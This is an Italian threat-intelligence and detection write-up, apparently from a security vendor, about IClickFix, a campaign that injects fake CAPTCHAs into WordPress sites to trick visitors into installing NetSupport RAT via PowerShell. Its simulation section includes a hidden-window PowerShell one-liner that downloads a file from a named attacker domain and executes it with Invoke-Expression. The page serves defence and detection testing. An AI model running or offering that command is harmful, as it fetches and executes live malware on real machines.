Presentazione di IClickFix: un diffuso framework di attacco indirizzato a WordPress utilizzando la tattica ClickFix
Detection stack
- AIDR
- Alert
- ETL
- Query
Sommario
Il rapporto profila IClickFix, un framework JavaScript dannoso che compromette i siti WordPress e presenta un CAPTCHA contraffatto in stile Cloudflare Turnstile. L’esca costringe i visitatori ad eseguire un comando PowerShell che scarica e installa NetSupport RAT. La distribuzione è supportata da un sistema di distribuzione del traffico costruito attorno all’abbreviazione di URL YOURLS e da un insieme rotante di domini di reindirizzamento. I ricercatori hanno osservato più di 3.800 siti WordPress compromessi servire questa catena a livello globale dalla fine del 2024.
Indagine
Gli analisti di Sekoia hanno identificato il tag JavaScript iniettato ic-tracker-js nei siti compromessi, poi hanno ricostruito il flusso di reindirizzamento attraverso più domini di breve durata. Hanno catturato il modello esatto di esecuzione PowerShell utilizzato per recuperare il payload finale e recuperato i componenti NetSupport RAT rilasciati insieme agli indicatori dell’infrastruttura C2 associata.
Mitigazione
Monitorare i contenuti web per l’ ic-tracker-js iniezione e bloccare i domini dannosi noti, i reindirizzatori e i servizi di link brevi utilizzati nella catena. Sugli endpoint, rilevare schemi di download ed esecuzione PowerShell coerenti con l’esca ClickFix. Aggiungere copertura per la creazione di file client NetSupport e per la persistenza tramite chiavi Run del registro di livello utente.
Risposta
Quando emergono indicatori, isolare l’endpoint, fermare il processo PowerShell attivo e rimuovere i binari NetSupport più qualsiasi persistenza basata sul registro. Seguire con una triage forense completa per confermare che l’attaccante non abbia distribuito impianti aggiuntivi o stabilito percorsi di accesso secondari.
Flusso di Attacco
Rilevamenti
Download o caricamento tramite PowerShell (tramite cmdline)
Visualizza
File sospetti nel profilo utente pubblico (tramite file_event)
Visualizza
Possibilità di esecuzione tramite righe di comando PowerShell nascoste (tramite cmdline)
Visualizza
Uso sospetto di Invoke-RestMethod (tramite PowerShell)
Visualizza
Possibile tentativo di esecuzione binaria di NetSupport Manager da una directory sospetta (tramite process_creation)
Visualizza
Possibili punti di persistenza [ASEPs – Hive software/NTUSER] (tramite registry_event)
Visualizza
IOC (HashSha256) per rilevare: Incontra IClickFix: un framework diffuso che prende di mira WordPress usando la tattica ClickFix
Visualizza
IOC (DestinazioneIP) per rilevare: Incontra IClickFix: un framework diffuso che prende di mira WordPress usando la tattica ClickFix
Visualizza
IOC (SourceIP) per rilevare: Incontra IClickFix: un framework diffuso che prende di mira WordPress usando la tattica ClickFix
Visualizza
Rilevamento dell’iniezione JavaScript dannoso di IClickFix [Webserver]
Visualizza
Esecuzione del Comando PowerShell per la consegna di NetSupport RAT [Windows PowerShell]
Visualizza
Esecuzione simulazione
Prerequisito: Il Telemetry & Baseline Pre‑flight Check deve essere passato.
-
Narrativa e Comandi dell’Attacco:
Un avversario che ha accesso iniziale all’endpoint desidera stabilire una presenza persistente consegnando il NetSupport RAT. Per evitare il rilevamento interattivo, lanciano PowerShell in modalità nascosta senza profilo o logo (
-w hidden -nop -c). Usano quindiInvoke‑WebRequest(iwr) per scaricare un payload JSON malevolo (tytuy.json) che contiene uno script PowerShell per il RAT. Lo script viene scritto nella directory temporanea ed eseguito tramiteInvoke‑Expression. Questa riga di comando esatta corrisponde alle stringhe che la regola Sigma monitora. -
Script di Test di Regressione:
# Unica riga PowerShell che corrisponde alla regola di rilevamento $url = 'https://scottvmorton.com/tytuy.json' $out = "$env:TEMPpayload.ps1" powershell -w hidden -nop -c "iwr '$url' -OutFile $out; iex (Get-Content $out -Raw)" -
Comandi di Pulizia:
# Rimuovere il payload scaricato ed eventuali processi PowerShell residui Remove-Item -Path "$env:TEMPpayload.ps1" -ErrorAction SilentlyContinue Get-Process -Name powershell | Where-Object {$_.CommandLine -match 'tytuy.json'} | Stop-Process -Force